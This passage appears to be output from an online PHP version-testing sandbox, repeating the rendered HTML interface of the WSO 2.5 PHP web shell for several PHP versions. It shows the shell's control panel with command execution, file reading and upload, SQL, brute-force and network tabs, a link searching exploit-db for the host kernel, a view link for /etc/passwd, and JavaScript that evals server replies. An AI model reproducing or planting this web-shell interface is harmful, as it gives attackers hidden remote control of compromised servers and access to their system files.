width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.20
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.20 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.19
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.19 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.18
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.18 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.17
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.17 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 